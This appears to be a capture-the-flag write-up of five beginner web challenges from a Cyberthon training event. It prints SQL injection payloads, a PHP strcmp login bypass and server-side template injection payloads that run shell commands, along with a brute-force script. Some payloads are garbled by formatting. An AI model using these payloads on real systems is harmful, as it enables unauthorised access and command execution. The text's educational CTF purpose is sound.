Cyberthon Training | Cyberthon Independent Learning Web Challenges

Published on: April 13, 2025

5 min read · Posted by elitecollapsez

Challenge Details

Description

Category

Web Exploitation

Difficulty

Easy

Topics

SQL Injection
SSTI
PHP

Competition

Cyberthon Training

Author

elitecollapsez

Solutions to the five web challenges

Writeup

Cyberthon training writeups

Web

Web 1 - Pie for Flag

The challenge is checking you knowledge on modifying request. Through the code, we can see that it requests for a few conditions to be met to give the flag.

  1. It requires a POST request
  2. It asks for the request header “I-Like” to have a value of Pie
  3. It ask for the request body “Pi” to have the first few digits of Pie, specifically given in the code.

Using BurpSuite, we can formula the request

/api/writeups/images/image.png

The response will return the flag

image.png

Flag: CTFSG{53R10U5_P13_4DD1CT10N}

Web2 - The Waiting Game

This challenge test for your knowledge in http cookies. Http cookies can be modified through developer tools in the application tab. In this challenge, it tells you that you can only retrieve flag if the time stamp is this specific time, represented in timestamp: ‘1-1-2345 12:00:00 AM GMT+8’

However, in cookies, it request for unix time, we can convert it using a code or a online website and we can get ‘11833833600’

Then, we can simply send a request to /flag endpoint with the cookie

image.png

The response will return the flag

image.png

Flag: CTFSG{1_W45_1MP4T13NT_50_1_T1M3_TR4V3LL3D}

Web3 - StoreMyFlag

The challenge description specifies the challenge to have a login system that uses sqlite and the key concepts is sql injection. Hence, we can get a rough direction of using sql injection payoads to retrieve the flag.

Upon reaching the website, we can use a simple sql payload ‘OR 1=1—, to check if sql injection exists, we receive a login successful, showing that sql payloads works, with no filter, blacklist or whitelist.

Now, we will need sql injection to help us retrieve information, mainly using a UNION attack. I didn’t think to select from sqli_master first (which is the table that stores the metadata of a database) and decide to guess retrieving from the users table. The payload is ‘UNION SELECT username, password FROM users—

image.png

I got a couple users and password other than the default john but it is not very useful.

From this, we can tell that the UNION attack should have two fields of string format.

Conducting a payload of ' UNION SELECT sql, null FROM sqlite_master— to retrieve the creation of table to retrieve this:

image.png

In the users table, there are four columns where we want to retrieve ctf_flag:

' UNION SELECT ctf_flag, null FROM users—

Author notes: Looking back, I should probably directly query from sqlite_master instead of guessing the users table as it is not a very proper solution

image.png

Flag: CTFSG{0H_W0W_Y0U_F0UND_M3_G00D_J0B}

Web4 - Admins Only

This challenge is regarding php vulnerabilities (one of the most hated languages). Looking at the source code, we can identify a vulnerable function ‘strcmp()’

strcmp() compares two strings and returns 0 if it is equal, <0 if it is lesser and >0 if it is more.

To login, we have to have a return value of 0. However, there is a weakness in this function, when comparing values of two different datatype, it will also return 0 e.g. comparing string with objects.

Knowing this, we can send a request with username: ‘admin’ and a password that is an object

image.png

The response will return the flag:

image.png

Reference solution: https://danuxx.blogspot.com/2013/03/unauthorized-access-bypassing-php-strcmp.html

Flag: CTFSG{L3RN1NG_W31RD_L4NGU4G3_QU1RK5}

Web 5 - BrowserID

The challenge outputs information about your browser, namely the user-agent. However, this information is being directly outputted into the website. Hence, this could be potentially vulnerable. We can do a simple test of {{ 7 * 7 }} and a return of 49 will prove it vulnerble to SSTI.

Using a normal payload to read the flag.txt (as most ctf ssti challenge will require you to retrieve flag from the directory ‘flag.txt’), it returns internal server error:

{{self.init.globals['os'].popen('cat flag.txt').read()}}"

image.png

This could be due to measures to block popen. We can create an alternative payload:

User-Agent: {{''.class.mro[1].subclasses()[]('cat flag.txt',shell=True,stdout=-1).communicate()[0]}}

We just need to know the index of popen in all the subclasses, which we can figure out through a bruteforce:

import requests

url = 'http://chals.t.cyberthon25.ctf.sg:34021/'

for i in range(0, 500):  # Try first 500 subclasses
payload = f"{{{{''.**class**.**mro**[1].**subclasses**()[{i}].**name**}}}}"
headers = {
"User-Agent": payload
}

print(f"[+] Trying index {i}")
response = requests.get(url, headers=headers)

if "Popen" in response.text or "subprocess" in response.text:
    print(f"[!] Found something interesting at index {i}!")
    print(response.text)
    break

This will reveal popen to be at index 337 [!] Found something interesting at index 337!

image.png

Final payload: {{''.class.mro[1].subclasses()[337]('cat flag.txt', shell=True, stdout=-1).communicate()[0]}}

image.png

Flag: CTFSG{TH4T5_S0M3_W31RD_BR0WZ3R_Y0U_G0T_TH3R3}

Please login to comment

Comments

No comments yet